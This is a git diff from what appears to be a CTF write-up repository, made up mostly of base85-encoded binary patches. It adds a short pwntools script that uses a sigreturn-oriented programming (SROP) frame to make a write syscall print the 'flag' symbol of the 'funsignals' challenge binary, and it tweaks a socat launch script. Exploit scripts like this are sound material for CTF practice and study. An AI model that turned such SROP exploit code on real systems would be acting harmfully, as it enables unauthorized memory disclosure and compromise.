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 b2@&4_Z~yzAa~2%%BQ2=_0qV#FVxayP6>(wL literal 0 HcmV?d00001 diff --git a/src/writeup/6.4_pwn_njctf2017_233/exp_funsignals.py b/src/writeup/6.4_pwn_njctf2017_233/exp_funsignals.py new file mode 100644 index 0000000..d0c817c --- /dev/null +++ b/src/writeup/6.4_pwn_njctf2017_233/exp_funsignals.py @@ -0,0 +1,19 @@ +from pwn import * + +elf = ELF('./funsignals_player_bin') +io = process('./funsignals_player_bin') +# io = remote('hack.bckdr.in', 9034) + +context.clear() +context.arch = "amd64" + +# Creating a custom frame +frame = SigreturnFrame() +frame.rax = constants.SYS_write +frame.rdi = constants.STDOUT_FILENO +frame.rsi = elf.symbols['flag'] +frame.rdx = 50 +frame.rip = elf.symbols['syscall'] + +io.send(str(frame)) +io.interactive() \ No newline at end of file diff --git a/src/writeup/6.4_pwn_njctf2017_233/funsignals_player_bin b/src/writeup/6.4_pwn_njctf2017_233/funsignals_player_bin new file mode 100755 index 0000000000000000000000000000000000000000..70c09c3361325f1647a488a1967f283bd5030440 GIT binary patch literal 4848 zcmeI0Jx{|h5QeX5BVbAxkdPRW5DcXa69Yn(Do`XCKw@CC+{XQY^h2@5*TM?_hKacw z3lskVX7~lcb}oq;T2*3pq~^VQ@8V0It@n6zdTf@t?mO+l#N9OUHh9Y~PFhx5UaA? z8j?OIR1nUh8x|E${+pMR&BD}Qd9^>Nz)xK4-q1z~*7ALVb~e$MI(5#r^xYZf@67S* z+Lv?PhK%w{eX^_Gr{Fi|_)rsracz7%tWrLxUeq7hU9-jo8}9+X=WQB>pwIy!T+m2J zZE>E)ETDn{VZ#7mm){QrZAleTqP;v~Vb~r8EPu^^M~Z8!>SIXU%Wmd>{K#DbD`|+J#oN literal 0 HcmV?d00001 diff --git a/src/writeup/6.4_pwn_njctf2017_233/run.sh b/src/writeup/6.4_pwn_njctf2017_233/run.sh index a0396e2..1cf8b02 100755 --- a/src/writeup/6.4_pwn_njctf2017_233/run.sh +++ b/src/writeup/6.4_pwn_njctf2017_233/run.sh @@ -1 +1 @@ -socat tcp4-listen:10001,reuseaddr,fork exec:./233 +socat tcp4-listen:10001,reuseaddr,fork exec:./233 &